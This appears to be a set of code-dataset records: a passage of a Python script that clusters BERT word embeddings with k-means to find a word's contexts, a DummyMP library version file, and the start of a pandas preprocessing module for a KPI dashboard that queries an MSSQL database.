with open(mat_dir + inp_str + "_matrix.dat", "wb") as tm:
pickle.dump(target_matrix, tm)
target_matrix
## Kmeans Elbow Method
from sklearn.cluster import KMeans
from scipy.spatial.distance import cdist
X = target_matrix
from sklearn.decomposition import PCA
pca = PCA(n_components=3)
X_ = pca.fit_transform(X)
K = range (1,11)
wcss = []
distortions = []
for i in K:
kmeans = KMeans(n_clusters = i, init = "k-means++", max_iter = 300, n_init = 10, random_state=0)
kmeans.fit(X)
wcss.append(kmeans.inertia_)
distortions.append(sum(np.min(cdist(X, kmeans.cluster_centers_, 'euclidean'), axis=1)) / X.shape[0])
from kneed import KneeLocator
kn = KneeLocator(list(K), distortions, S=1.0, curve='convex', direction='decreasing')
import matplotlib.pyplot as plt
figure = plt.plot(range(1,11), wcss)
plt.title(" The Elbow Method")
plt.xlabel("Number of Clusters")
plt.ylabel("WCSS")
plt.savefig(dir_path + clustering_type + "/" + directory_input + "/" + inp_str + "_" + str(1) + "/" + inp_str + "_" + str(1) + "_" +"cluster" + "_" + "elbow.png")
plt.clf()
print(wcss)
per_dec_list = []
k_op = 1
K_clust = 1
K_clustr = 1
for wc in range(0,len(wcss)-1):
perc_dec = (1 - (wcss[wc +1]/wcss[wc]))*100
print(perc_dec)
per_dec_list.append(perc_dec)
print('\n')
for per in range(len(per_dec_list)):
if per_dec_list[per] > 23:
k_op = wcss.index(wcss[per + 1])
K_clust = k_op + 1
else:
K_clustr = 1
print(K_clust)
if K_clustr == K_clust:
optimal_k = 1
else:
optimal_k = K_clust
print(optimal_k)
from yellowbrick.cluster import KElbowVisualizer
X = target_matrix
from sklearn.decomposition import PCA
pca = PCA(n_components=3)
X_ = pca.fit_transform(X)
kmeans = KMeans(n_clusters = i, init = "k-means++", max_iter = 300, n_init = 10, random_state=0)
visualizer = KElbowVisualizer(kmeans, k=(1,10))
visualizer.fit(X_)
# Fit the data to the visualizer
plt.xlabel("k clusters")
plt.ylabel("distotion score")
plt.savefig(dir_path + clustering_type + "/" + directory_input + "/" + inp_str + "_" + str(1) + "/" + inp_str + "_" + str(1) + "_" +"cluster" + "_" + "elbow1.png")
#visualizer.show()
plt.clf()
## Intercluster Distance
from yellowbrick.cluster import InterclusterDistance
from sklearn.manifold import MDS
mod = KMeans(optimal_k)
visuals = InterclusterDistance(mod, embedding = 'tsne')
visuals.fit(X_) # Fit the data to the visualizer
plt.savefig(dir_path + clustering_type + "/" + directory_input + "/" + inp_str + "_" + str(1) + "/" + inp_str + "_" + str(1) + "_" +"cluster" + "_" + "ICD.png")
plt.clf()
## Gap Statistics
import numpy as np
import matplotlib.pyplot as plt
from sklearn.datasets import make_blobs
from sklearn.metrics import pairwise_distances
from sklearn.cluster import KMeans
from sklearn.decomposition import PCA
#PCA Transformation
from sklearn.decomposition import PCA
pca = PCA(n_components=3)
X_ = pca.fit_transform(X)
def compute_inertia(a, X):
W = [np.mean(pairwise_distances(X[a == c, :])) for c in np.unique(a)]
return np.mean(W)
def compute_gap(clustering, data, k_max=5, n_references=5):
if len(data.shape) == 1:
data = data.reshape(-1, 1)
reference = np.random.rand(*data.shape)
reference_inertia = []
for k in range(1, k_max+1):
local_inertia = []
for _ in range(n_references):
clustering.n_clusters = k
assignments = clustering.fit_predict(reference)
local_inertia.append(compute_inertia(assignments, reference))
reference_inertia.append(np.mean(local_inertia))
ondata_inertia = []
for k in range(1, k_max+1):
clustering.n_clusters = k
assignments = clustering.fit_predict(data)
ondata_inertia.append(compute_inertia(assignments, data))
gap = np.log(reference_inertia)-np.log(ondata_inertia)
return gap, np.log(reference_inertia), np.log(ondata_inertia)
k_max = 5
gap, reference_inertia, ondata_inertia = compute_gap(KMeans(), X_, k_max)
plt.plot(range(1, k_max+1), reference_inertia,
'-o', label='reference')
plt.plot(range(1, k_max+1), ondata_inertia,
'-o', label='data')
plt.xlabel('k')
plt.ylabel('log(inertia)')
plt.savefig(dir_path + clustering_type + "/" + directory_input + "/" + inp_str + "_" + str(1) + "/" + inp_str + "_" + str(1) + "_" +"cluster" + "_" + "gap_inertia.png")
plt.clf()
plt.plot(range(1, k_max+1), gap, '-o')
plt.ylabel('gap')
plt.xlabel('k')
plt.savefig(dir_path + clustering_type + "/" + directory_input + "/" + inp_str + "_" + str(1) + "/" + inp_str + "_" + str(1) + "_" +"cluster" + "_" + "gap.png")
plt.clf()
for n in range(len(gap)):
if gap[n] == gap.max():
k_cluster_no = n +1
word_contexts = k_cluster_no
print("The predicted number of optimum clusters are {}".format(k_cluster_no))
print("The predicted number of contexts for the word {} are {}".format(inp_str, k_cluster_no))
## Silhouette Method Kmeans
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.animation as animation
from sklearn.cluster import KMeans
from sklearn import metrics
from sklearn.metrics import silhouette_score
sil = []
kmax = 5
# dissimilarity would not be defined for a single cluster, thus, minimum number of clusters should be 2
for k in range(2, kmax+1):
kmeans = KMeans(n_clusters = k).fit(X_)
labels = kmeans.labels_
sil.append(silhouette_score(X_, labels, metric = 'euclidean'))
sil
figure = plt.plot(range(2,kmax+1), sil)
plt.title(" The Silhouette Method")
plt.xlabel("Number of Clusters")
plt.ylabel("Sill")
plt.savefig(dir_path + clustering_type + "/" + directory_input + "/" + inp_str + "_" + str(1) + "/" + inp_str + "_" + str(1) + "_" +"cluster" + "_" + "sil.png")
plt.clf()
sil = np.array(sil)
for g in range(len(sil)):
if sil[g] == sil.max():
if sil.max() <= 0.53:
k_sil = 1
print("The predicted number of optimum clusters are {}".format(k_sil))
print("The predicted number of contexts for the word {} are {}".format(inp_str, k_sil))
else:
k_sil = g +2
print("The predicted number of optimum clusters are {}".format(k_sil))
print("The predicted number of contexts for the word {} are {}".format(inp_str, k_sil))
from yellowbrick.cluster import SilhouetteVisualizer
visualizer_sil = SilhouetteVisualizer(kmeans, colors='yellowbrick')
visualizer_sil.fit(X_) # Fit the data to the visualizer
plt.savefig(dir_path + clustering_type + "/" + directory_input + "/" + inp_str + "_" + str(1) + "/" + inp_str + "_" + str(1) + "_" +"cluster" + "_" + "sil_color.png")
plt.clf()
## Cluster Analysis
n_clusters = k_sil
word_of_cluster_0 = []
word_of_cluster_1 = []
sent_of_cluster_0 = []
sent_of_cluster_1 = []
word_of_cluster_2 = []
word_of_cluster_3 = []
sent_of_cluster_2 = []
sent_of_cluster_3 = []
word_of_cluster_4 = []
word_of_cluster_5 = []
sent_of_cluster_4 = []
sent_of_cluster_5 = []
if n_clusters == 1:
kmeans = KMeans(n_clusters = n_clusters , init ="k-means++", max_iter= 300 , n_init= 10, random_state = 0 , precompute_distances = True)
kmeans.fit(X)
y_kmeans = kmeans.predict(X)
for km in range(len(y_kmeans)):
if y_kmeans[km] == 0:
word_of_cluster_0.append(label_list[km])
sent_of_cluster_0.append(inter_sent[km])
##Plotting
"""User can plot the clusters if they wish"""
#plt.scatter(X[y_kmeans == 0, 0], X[y_kmeans == 0, 1], s = 100, c = 'red', label = 'Cluster 1')
#plt.scatter(X[y_kmeans == 1, 0], X[y_kmeans == 1, 1], s = 100, c = 'blue', label = 'Cluster 2')
#plt.scatter(X[y_kmeans == 2, 0], X[y_kmeans == 2, 1], s = 100, c = 'green', label = 'Cluster 3')
#plt.scatter(X[y_kmeans == 3, 0], X[y_kmeans == 3, 1], s = 100, c = 'cyan', label = 'Cluster 4')
#plt.scatter(X[y_kmeans == 4, 0], X[y_kmeans == 4, 1], s = 100, c = 'magenta', label = 'Cluster 5')
#plt.scatter(kmeans.cluster_centers_[:, 0], kmeans.cluster_centers_[:, 1], s = 150, c = 'black', label = 'Centroids')
#plt.title('Clusters of the word {}' .format(inp_str))
#plt.xlabel('{} Labels Along X-axis' .format(inp_str))
#plt.ylabel('{} Labels Along Y-axis' .format(inp_str))
#plt.legend()
#plt.savefig("/home/amboo/Desktop/BERT/kmeans/{}.png" . format(inp_str))
#plt.clf()
if n_clusters == 2:
kmeans = KMeans(n_clusters = 2 , init ="k-means++", max_iter= 300 , n_init= 10, random_state = 0 , precompute_distances = False)
kmeans.fit(X)
y_kmeans = kmeans.predict(X)
for km in range(len(y_kmeans)):
if y_kmeans[km] == 0:
word_of_cluster_0.append(label_list[km])
sent_of_cluster_0.append(inter_sent[km])
if y_kmeans[km] == 1:
word_of_cluster_1.append(label_list[km])
sent_of_cluster_1.append(inter_sent[km])
##Plotiing
"""User can plot the clusters if they wish"""
#plt.scatter(X[y_kmeans == 0, 0], X[y_kmeans == 0, 1], s = 100, c = 'red', label = 'Cluster 1')
#plt.scatter(X[y_kmeans == 1, 0], X[y_kmeans == 1, 1], s = 100, c = 'blue', label = 'Cluster 2')
#plt.scatter(X[y_kmeans == 2, 0], X[y_kmeans == 2, 1], s = 100, c = 'green', label = 'Cluster 3')
#plt.scatter(X[y_kmeans == 3, 0], X[y_kmeans == 3, 1], s = 100, c = 'cyan', label = 'Cluster 4')
#plt.scatter(X[y_kmeans == 4, 0], X[y_kmeans == 4, 1], s = 100, c = 'magenta', label = 'Cluster 5')
#plt.scatter(kmeans.cluster_centers_[:, 0], kmeans.cluster_centers_[:, 1], s = 150, c = 'black', label = 'Centroids')
#plt.title('Clusters of the word {}' .format(inp_str))
#plt.xlabel('{} Labels Along X-axis' .format(inp_str))
#plt.ylabel('{} Labels Along Y-axis' .format(inp_str))
#plt.legend()
#plt.savefig("/home/amboo/Desktop/BERT/kmeans/{}.png" . format(inp_str))
#plt.clf()
if n_clusters == 3:
kmeans = KMeans(n_clusters = n_clusters , init ="k-means++", max_iter= 300 , n_init= 10, random_state = 0 , precompute_distances = True)
kmeans.fit(X)
y_kmeans = kmeans.predict(X)
for km in range(len(y_kmeans)):
if y_kmeans[km] == 0:
word_of_cluster_0.append(label_list[km])
sent_of_cluster_0.append(inter_sent[km])
if y_kmeans[km] == 1:
word_of_cluster_1.append(label_list[km])
sent_of_cluster_1.append(inter_sent[km])
if y_kmeans[km] == 2:
word_of_cluster_2.append(label_list[km])
sent_of_cluster_2.append(inter_sent[km])
#Plotting
"""User can plot the clusters if they wish"""
#plt.scatter(X[y_kmeans == 0, 0], X[y_kmeans == 0, 1], s = 100, c = 'red', label = 'Cluster 1')
#plt.scatter(X[y_kmeans == 1, 0], X[y_kmeans == 1, 1], s = 100, c = 'blue', label = 'Cluster 2')
#plt.scatter(X[y_kmeans == 2, 0], X[y_kmeans == 2, 1], s = 100, c = 'green', label = 'Cluster 3')
#plt.scatter(X[y_kmeans == 3, 0], X[y_kmeans == 3, 1], s = 100, c = 'cyan', label = 'Cluster 4')
#plt.scatter(X[y_kmeans == 4, 0], X[y_kmeans == 4, 1], s = 100, c = 'magenta', label = 'Cluster 5')
#plt.scatter(kmeans.cluster_centers_[:, 0], kmeans.cluster_centers_[:, 1], s = 150, c = 'black', label = 'Centroids')
#plt.title('Clusters of the word {}' .format(inp_str))
#plt.xlabel('{} Labels Along X-axis' .format(inp_str))
#plt.ylabel('{} Labels Along Y-axis' .format(inp_str))
#plt.legend()
#plt.savefig("/home/amboo/Desktop/BERT/kmeans/{}.png" . format(inp_str))
#plt.clf()
if n_clusters == 4:
    # Cluster the embedding matrix X into 4 groups. precompute_distances is
    # deprecated/ignored in newer scikit-learn; kept for compatibility.
    kmeans = KMeans(n_clusters=n_clusters, init="k-means++", max_iter=300,
                    n_init=10, random_state=0, precompute_distances=False)
    kmeans.fit(X)
    y_kmeans = kmeans.predict(X)
    # Route each sample's label/sentence into its cluster bucket (replaces
    # the original chain of `if y_kmeans[km] == c:` tests, one per cluster).
    _word_buckets = (word_of_cluster_0, word_of_cluster_1,
                     word_of_cluster_2, word_of_cluster_3)
    _sent_buckets = (sent_of_cluster_0, sent_of_cluster_1,
                     sent_of_cluster_2, sent_of_cluster_3)
    for km in range(len(y_kmeans)):
        _cid = y_kmeans[km]
        _word_buckets[_cid].append(label_list[km])
        _sent_buckets[_cid].append(inter_sent[km])
    ## Plotting
    # Optional matplotlib scatter of clusters/centroids removed; re-add a
    # plt.scatter/savefig snippet here if visual inspection is needed.
if n_clusters == 5:
    # Cluster the embedding matrix X into 5 groups.
    # NOTE(review): precompute_distances=True differs from the other
    # branches (False) — presumably unintentional; kept as-is (the flag is
    # deprecated/ignored in newer scikit-learn anyway).
    kmeans = KMeans(n_clusters=n_clusters, init="k-means++", max_iter=300,
                    n_init=10, random_state=0, precompute_distances=True)
    kmeans.fit(X)
    y_kmeans = kmeans.predict(X)
    # Route each sample's label/sentence into its cluster bucket (replaces
    # the original chain of `if y_kmeans[km] == c:` tests, one per cluster).
    _word_buckets = (word_of_cluster_0, word_of_cluster_1, word_of_cluster_2,
                     word_of_cluster_3, word_of_cluster_4)
    _sent_buckets = (sent_of_cluster_0, sent_of_cluster_1, sent_of_cluster_2,
                     sent_of_cluster_3, sent_of_cluster_4)
    for km in range(len(y_kmeans)):
        _cid = y_kmeans[km]
        _word_buckets[_cid].append(label_list[km])
        _sent_buckets[_cid].append(inter_sent[km])
    ## Plotting
    # Optional matplotlib scatter of clusters/centroids removed; re-add a
    # plt.scatter/savefig snippet here if visual inspection is needed.
##############################################################################################################
### Functions
def Sort(sub_li):
    """Sort *sub_li* in place by each item's second element, descending.

    The very same (now reordered) list object is returned so the call can
    be used inline.
    """
    sub_li.sort(key=lambda item: item[1], reverse=True)
    return sub_li
import pandas as pd
def get_word_vector(word_no, word_list, static_list, dynamic_list, threshold, freq):
    """Rank *word_list* entries by cosine similarity to one reference vector.

    Compares ``static_list[word_no]`` against every vector in *dynamic_list*,
    keeps the entries whose similarity is at least *threshold*, and stores
    the top *freq* of them (descending similarity) in the module-level
    ``sort_list``, which is also returned.

    Returns None (with ``sort_list`` possibly partially filled) when fewer
    than *freq* entries clear the threshold — the IndexError is swallowed
    on purpose so callers can retry with a smaller *freq*.
    """
    global rel_list_
    global rel_list
    global cos_dist_
    global frame
    global sort_list
    sort_list = []
    cos_dist_ = []
    global ref
    ref = {}
    try:
        # One similarity score per candidate vector.
        for dynm in range(len(dynamic_list)):
            cos_dist = 1 - cosine(static_list[word_no], dynamic_list[dynm])
            cos_dist_.append(cos_dist)
        # BUGFIX: this ranking originally sat inside the loop above, so the
        # function returned during the first iteration (and, for more than
        # one word, raised ValueError because the "Words" and "Distance"
        # columns had different lengths). Build it once, after all
        # distances are known.
        ref = {"Words": word_list, "Distance": cos_dist_}
        frame = pd.DataFrame(ref, columns=["Words", "Distance"])
        rel_list = frame[frame["Distance"] >= threshold].values.tolist()
        rel_list_ = Sort(rel_list)  # in-place sort; rel_list is sorted too
        for rank in range(freq):
            sort_list.append(rel_list[rank])
        return sort_list
    except IndexError:
        # Fewer than `freq` qualifying words: preserve the original
        # swallow-and-return-None behaviour.
        pass
def get_context(cluster_no, sent_of_cluster, n_el_clus_list, threshold, frequency):
    """Resolve and log the context words for one member of a cluster.

    Consolidates the five copy-pasted per-cluster branches of the original:
    the per-cluster module-level lists (word_of_cluster_N / word_of_cluster_bN,
    word_list_refinedN, vector_list_refinedN) are looked up by name, so the
    behaviour for ``cluster_no`` in 0..4 is unchanged.  For any other
    ``cluster_no`` the function, like the original, does nothing and
    returns None.

    Side effects: fills the module-level ``sort_list`` via get_word_vector
    and appends a report to the per-word result file.  Returns ``sort_list``.
    """
    if cluster_no not in (0, 1, 2, 3, 4):
        return None
    # Pick the label list matching the active clustering backend.
    if clustering_type == 'kmeans':
        source_words = globals()["word_of_cluster_" + str(cluster_no)]
    if clustering_type == 'birch':
        source_words = globals()["word_of_cluster_b" + str(cluster_no)]
    print(source_words[n_el_clus_list])
    # The label entry embeds the token index; the last all-digit token wins
    # (`word_label` stays unbound when none is found, exactly as before).
    for word in str(source_words[n_el_clus_list]).split():
        if word.isdigit():
            word_label = int(word)
    print(sent_of_cluster[n_el_clus_list])
    get_word_vector(word_label,
                    globals()["word_list_refined" + str(cluster_no)],
                    vector_mat_list,
                    globals()["vector_list_refined" + str(cluster_no)],
                    threshold, frequency)
    # NOTE: the report always writes the k-means label list, even when
    # `clustering_type` is 'birch' — this mirrors every original branch.
    kmeans_words = globals()["word_of_cluster_" + str(cluster_no)]
    out_path = (dir_path + clustering_type + "/" + directory_input + "/"
                + inp_str + "_" + str(1) + "/" + inp_str + "_" + str(1)
                + "_" + "cluster" + str(cluster_no) + "_" + ".txt")
    with open(out_path, "a") as cw:
        cw.write("The Target Word is " + inp_str + "\n")
        cw.write("The no of total clusters are " + str(n_clusters) + "\n")
        cw.write("The word belongs to {} cluster".format(cluster_no) + "\n")
        cw.write(str(kmeans_words[n_el_clus_list]))
        cw.write("\n")
        cw.write(str(sent_of_cluster[n_el_clus_list]))
        cw.write("\n")
        cw.write("\n")
        for th in sort_list:
            cw.write(str(th))
            cw.write("\n")
    return sort_list
## Approach 1 :- Obtaining Sentence wise vector embeddings of the words w.r.t clusters
def get_embeddings(list_of_cluster_sentences, n_th_cluster):
    """Embed every sentence of one cluster and collect per-token vectors.

    For each sentence, runs the (presumably BERT-style — confirm) global
    `tokenizer`/`model` pair, sums the last four hidden layers per token,
    and appends every token except the target word (`inp_str`) and `wrt`
    to the module-level lists ``word_list_<n>`` / ``vector_list_<n>``.
    Finally deduplicates by token text into ``word_list_refined<n>`` /
    ``vector_list_refined<n>`` (first occurrence wins).

    Sentences that fail tokenization/inference (IndexError, RuntimeError)
    are skipped, as before.
    """
    globals()["vector_list_" + str(n_th_cluster)] = []
    globals()["word_list_" + str(n_th_cluster)] = []
    globals()["vector_list_refined" + str(n_th_cluster)] = []
    globals()["word_list_refined" + str(n_th_cluster)] = []
    for emd in range(len(list_of_cluster_sentences)):
        try:
            marked_text = "[CLS]" + " " + list_of_cluster_sentences[emd] + " " + "[SEP]"
            tokenized_text = tokenizer.tokenize(marked_text)
            indexed_tokens = tokenizer.convert_tokens_to_ids(tokenized_text)
            segment_ids = [1] * len(tokenized_text)
            tokens_tensors = torch.tensor([indexed_tokens])
            segments_tensors = torch.tensor([segment_ids])
            with torch.no_grad():
                output = model(tokens_tensors, segments_tensors)
            hidden_states = output[2]
            # (layers, 1, tokens, dim) -> (tokens, layers, dim)
            token_embeddings_ = torch.stack(hidden_states, dim=0)
            token_embeddings_ = torch.squeeze(token_embeddings_, dim=1)
            token_embeddings_ = token_embeddings_.permute(1, 0, 2)
            print(token_embeddings_.size())
            # Per-token vector: sum of the last four hidden layers.
            token_vecs_sum_ = []
            for token in token_embeddings_:
                sum_vec_ = torch.sum(token[-4:], dim=0)
                token_vecs_sum_.append(sum_vec_)
            # Sentence vector: mean over tokens of the second-to-last layer.
            token_vecs = hidden_states[-2][0]
            sentence_embedding = torch.mean(token_vecs, dim=0)
            print ("Our final sentence embedding vector of shape:", sentence_embedding.size())
            for tok in range(len(tokenized_text)):
                if tokenized_text[tok] != inp_str and tokenized_text[tok] != wrt:
                    globals()["vector_list_" + str(n_th_cluster)].append(token_vecs_sum_[tok])
                    globals()["word_list_" + str(n_th_cluster)].append(tokenized_text[tok])
        except (IndexError, RuntimeError) as e:
            continue
    # Deduplicate by token text, keeping the first occurrence.
    # PERF: membership test against a set instead of the growing refined
    # list (the original was O(n^2) over the vocabulary).
    _seen = set()
    _words = globals()["word_list_" + str(n_th_cluster)]
    _vecs = globals()["vector_list_" + str(n_th_cluster)]
    for refi in range(len(_words)):
        if _words[refi] not in _seen:
            _seen.add(_words[refi])
            globals()["word_list_refined" + str(n_th_cluster)].append(_words[refi])
            globals()["vector_list_refined" + str(n_th_cluster)].append(_vecs[refi])
if clustering_type == "kmeans":
    ## Splitting into context buckets
    # One get_embeddings pass per cluster. Replaces the original chain of
    # `if n_clusters == 1..5` branches with the same guard + a loop; the
    # sentence buckets are module-level lists named by suffix.
    if 1 <= n_clusters <= 5:
        print("The number of clusters is {}".format(n_clusters))
        for _cluster_id in range(n_clusters):
            get_embeddings(globals()["sent_of_cluster_" + str(_cluster_id)], _cluster_id)
#print(len(word_list_refined0))
#print(len(vector_list_refined0))
#print(len(sentence_list_refined2))
## Threshold Plot
def tplot(clust, label_int):
    """Scatter-plot cosine distances from one reference vector to a cluster's vocabulary.

    Consolidates the five copy-pasted per-cluster branches of the original:
    the per-cluster lists ``word_list_refined<clust>`` /
    ``vector_list_refined<clust>`` are looked up by name, so behaviour for
    ``clust`` in 0..4 is unchanged (anything else is a silent no-op, as
    before).

    Saves the scatter plot next to the other per-word artifacts and prints
    mean/mode/median/max distance plus kurtosis of the frame.
    """
    if clust not in (0, 1, 2, 3, 4):
        return
    words = globals()["word_list_refined" + str(clust)]
    vectors = globals()["vector_list_refined" + str(clust)]
    # Integer x-axis positions, one per vocabulary entry.
    label_int_list = list(range(len(words)))
    cos_d_ = []
    label_ = label_int
    print("\n********************************************\n")
    # Distance of the chosen reference embedding to every cluster vector.
    for dynm in range(len(vectors)):
        cos_d = 1 - cosine(vector_mat_list[label_], vectors[dynm])
        cos_d_.append(cos_d)
    fer0 = {"Words": words, "Word Int": label_int_list, "Distance": cos_d_}
    frame0 = pd.DataFrame(fer0, columns=["Words", "Word Int", "Distance"])
    frame0.plot.scatter(x="Word Int", y="Distance", c='DarkBlue')
    # Filename layout (incl. the double underscore) kept identical to the
    # original branches.
    plt.savefig(dir_path + clustering_type + "/" + directory_input + "/"
                + inp_str + "_" + str(1) + "/" + inp_str + "_" + str(1)
                + "_" + "cluster" + str(clust) + "_" + "_" + "label" + "_"
                + str(label_) + "_" + "scatter.png")
    print("The Mean Distance is {} \n********************************************\n".format(frame0["Distance"].mean()))
    print("The Mode Distance is {} \n********************************************\n".format(frame0["Distance"].mode()))
    print("The Median Distance is {} \n********************************************\n".format(frame0["Distance"].median()))
    print("The Max Distance is {} \n********************************************\n".format(frame0["Distance"].max()))
    print("\n********************************************\n")
    print("Kurtosis Information is {} \n********************************************\n".format(frame0.kurtosis(axis=0)))
# Produce one threshold scatter plot per requested label index.
for label_idx in range(lower_label_int, upper_label_int):
    tplot(cluster_num_plot, label_idx)
## Collecting results for cluster 0
if n_clusters == 1:
    if clustering_type == 'kmeans':
        # Retry cascade: ask get_context for a progressively smaller top-k
        # until it succeeds. The failure messages and the deliberately
        # unprotected final k=1 attempt (its IndexError still propagates)
        # match the original nested try/except chain.
        for res0 in range(len(word_of_cluster_0)):
            for attempt, freq in enumerate((50, 40, 35, 30, 20, 10, 5)):
                try:
                    get_context(0, sent_of_cluster_0, res0, thresh, freq)
                    break
                except IndexError:
                    print(("1st", "2nd", "3rd", "4th", "5th", "6th", "7th")[attempt]
                          + " Exception Occured")
            else:
                # Every sized attempt failed: last resort with a single word.
                get_context(0, sent_of_cluster_0, res0, thresh, 1)
if n_clusters == 2:
    if clustering_type == 'kmeans':
        # Retry cascade over both clusters: shrink the requested top-k
        # until get_context succeeds; the final k=1 attempt is unprotected
        # so its IndexError still propagates, as in the original.
        # BUGFIX: the original cluster-1 retry at k=40 indexed with the
        # stale `res0` left over from the cluster-0 loop; this loop always
        # uses the current cluster's own index.
        for cid, words, sents in ((0, word_of_cluster_0, sent_of_cluster_0),
                                  (1, word_of_cluster_1, sent_of_cluster_1)):
            for idx in range(len(words)):
                for attempt, freq in enumerate((50, 40, 35, 30, 20, 10, 5)):
                    try:
                        get_context(cid, sents, idx, thresh, freq)
                        break
                    except IndexError:
                        print(("1st", "2nd", "3rd", "4th", "5th", "6th", "7th")[attempt]
                              + " Exception Occured")
                else:
                    # Every sized attempt failed: last resort, single word.
                    get_context(cid, sents, idx, thresh, 1)
if n_clusters == 3:
    if clustering_type == 'kmeans':
        ## Collecting results for clusters 0-2
        # Retry cascade: shrink the requested top-k until get_context
        # succeeds; the final k=1 attempt is unprotected so its IndexError
        # still propagates, as in the original nested try/except chains.
        # BUGFIX: the original cluster-1 retry at k=40 indexed with the
        # stale `res0` from the cluster-0 loop; this loop always uses the
        # current cluster's own index.
        for cid, words, sents in ((0, word_of_cluster_0, sent_of_cluster_0),
                                  (1, word_of_cluster_1, sent_of_cluster_1),
                                  (2, word_of_cluster_2, sent_of_cluster_2)):
            for idx in range(len(words)):
                for attempt, freq in enumerate((50, 40, 35, 30, 20, 10, 5)):
                    try:
                        get_context(cid, sents, idx, thresh, freq)
                        break
                    except IndexError:
                        print(("1st", "2nd", "3rd", "4th", "5th", "6th", "7th")[attempt]
                              + " Exception Occured")
                else:
                    # Every sized attempt failed: last resort, single word.
                    get_context(cid, sents, idx, thresh, 1)
if n_clusters == 4:
    if clustering_type == 'kmeans':
        ## Collecting results for clusters 0-3
        # Retry cascade: shrink the requested top-k until get_context
        # succeeds; the final k=1 attempt is unprotected so its IndexError
        # still propagates, as in the original nested try/except chains.
        # BUGFIX: the original cluster-1 retry at k=40 indexed with the
        # stale `res0` from the cluster-0 loop; this loop always uses the
        # current cluster's own index.
        for cid, words, sents in ((0, word_of_cluster_0, sent_of_cluster_0),
                                  (1, word_of_cluster_1, sent_of_cluster_1),
                                  (2, word_of_cluster_2, sent_of_cluster_2),
                                  (3, word_of_cluster_3, sent_of_cluster_3)):
            for idx in range(len(words)):
                for attempt, freq in enumerate((50, 40, 35, 30, 20, 10, 5)):
                    try:
                        get_context(cid, sents, idx, thresh, freq)
                        break
                    except IndexError:
                        print(("1st", "2nd", "3rd", "4th", "5th", "6th", "7th")[attempt]
                              + " Exception Occured")
                else:
                    # Every sized attempt failed: last resort, single word.
                    get_context(cid, sents, idx, thresh, 1)
except ValueError as e:
continue | [
"noreply@github.com"
] | ambarish-moharil.noreply@github.com |
b865e63a7753fc872a6cae4bc619bda816d10669 | 3c8775c8c778bc9de813c98583cb2b13ff20e001 | /pyradmon/dummymp/_version.py | fde2e2f2af0b824f01b06a8f46ad5c1bb3b114c6 | [
"Apache-2.0"
] | permissive | will-mccarty/pyradmon | 8209a6055d1dbf21345c7fc7cdfd6e39bd6c1058 | 983b3562f251b7ef30ad405152e8095c34db47a5 | refs/heads/master | 2021-10-13T12:57:31.488695 | 2018-02-14T17:38:52 | 2018-02-14T17:38:52 | 23,162,074 | 0 | 2 | Apache-2.0 | 2021-10-15T12:41:47 | 2014-08-20T19:54:40 | Python | UTF-8 | Python | false | false | 831 | py | #!/usr/bin/env python
# DummyMP - Multiprocessing Library for Dummies!
# Copyright 2014 Albert Huang.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied. See the License for the specific language governing
# permissions and limitations under the License.
#
# DummyMP Library - Version Submodule
# multiprocessing library for dummies!
# (library for easily running functions in parallel)
#
global __version__
__version__ = "0.5b1"
| [
"alberthrocks@users.noreply.github.com"
] | alberthrocks@users.noreply.github.com |
15d540e7867223e3960efe65c50fb3381de9921c | f9de76468c160386deab995ddc7fb41c85ea3592 | /src/preprocess.py | e279f1f4a30e5bae77e0f8ee3a544d41e1944412 | [] | no_license | tdrei/kpi-web-app-streamlit | 1a7f73c1b027ad100a1561a10418ca011a80f43f | c1d2c78a105cfa758a721d0f22d56edf95ee7d8e | refs/heads/master | 2023-04-02T16:27:09.342870 | 2021-04-09T15:53:37 | 2021-04-09T15:53:37 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 15,977 | py | import datetime as dt
import logging
import logging.config
from pathlib import Path
from typing import Any, Dict
import numpy as np
import pandas as pd
from sqlalchemy import create_engine
import data_dicts
LOGGING_CONFIG = (Path(__file__).parent.parent / "logging.conf").absolute()
logging.config.fileConfig(fname=LOGGING_CONFIG, disable_existing_loggers=False)
logger = logging.getLogger("preprocessLogger")
SERVER = "JES2010HA01\\HA01,57226"
DB_NAME = "KF_CORE"
def connect_to_engine(server: str, db_name: str) -> Any:
    """Build the MSSQL/pyodbc connection string for the given server and
    database, create the engine and hand back an open connection object.
    """
    connection_url = f"mssql+pyodbc://@{server}/{db_name}?driver=SQL Server"
    return create_engine(connection_url).connect()
def read_query(file_path: str, n_years_back: int = 3) -> str:
    """Load the SQL query from *file_path* and substitute the
    ``@n_years_back`` placeholder with the requested look-back horizon
    in years (defaults to 3).
    """
    # utf-8-sig transparently strips a BOM if the file was saved with one.
    with open(file_path, "r", encoding="utf-8-sig") as sql_file:
        raw_query = sql_file.read()
    return raw_query.replace("@n_years_back", str(n_years_back))
def create_df(query, connection):
    """Fetch every row for `query` via `connection` and return the result
    as a dataframe whose columns are taken from the first row's keys.
    (Raises IndexError on an empty result set, like the original.)
    """
    rows = connection.execute(query).fetchall()
    return pd.DataFrame(rows, columns=rows[0].keys())
def create_calculation_date_column(df: pd.DataFrame) -> pd.DataFrame:
    """Replace the `period_value` with a "calculation date" that is
    set to the last day of the same month. (Note: this is not equal
    to the actual calculation date as defined in the DB.)
    """
    # `period_value` arrives as YYYYMM (e.g. 202001); parsing yields the
    # first day of that month.
    df["period_value"] = pd.to_datetime(df["period_value"], format="%Y%m")
    # Shift every timestamp to the last day of its month.
    df["period_value"] = df["period_value"].apply(lambda x: _get_last_day_of_month(x))
    return df.rename(columns={"period_value": "calculation_date"},)
def _get_last_day_of_month(some_date):
    """Return the date of the last day of the month `some_date` lies in."""
    # Jump safely into the following month (day 1 + 32 days always lands
    # there), snap to its first day, then step one day back.
    first_of_next = (some_date.replace(day=1) + dt.timedelta(days=32)).replace(day=1)
    return first_of_next - dt.timedelta(days=1)
def trim_strings(df: pd.DataFrame) -> pd.DataFrame:
    """Strip surrounding whitespace from every string cell; non-string
    cells pass through unchanged.
    """
    def _clean(cell):
        return cell.strip() if isinstance(cell, str) else cell
    return df.applymap(_clean)
def get_rid_of_invalid_entries(df: pd.DataFrame) -> pd.DataFrame:
    """Drop rows that do not carry real values: IT placeholder products
    and one KPI that is (temporarily) excluded.
    """
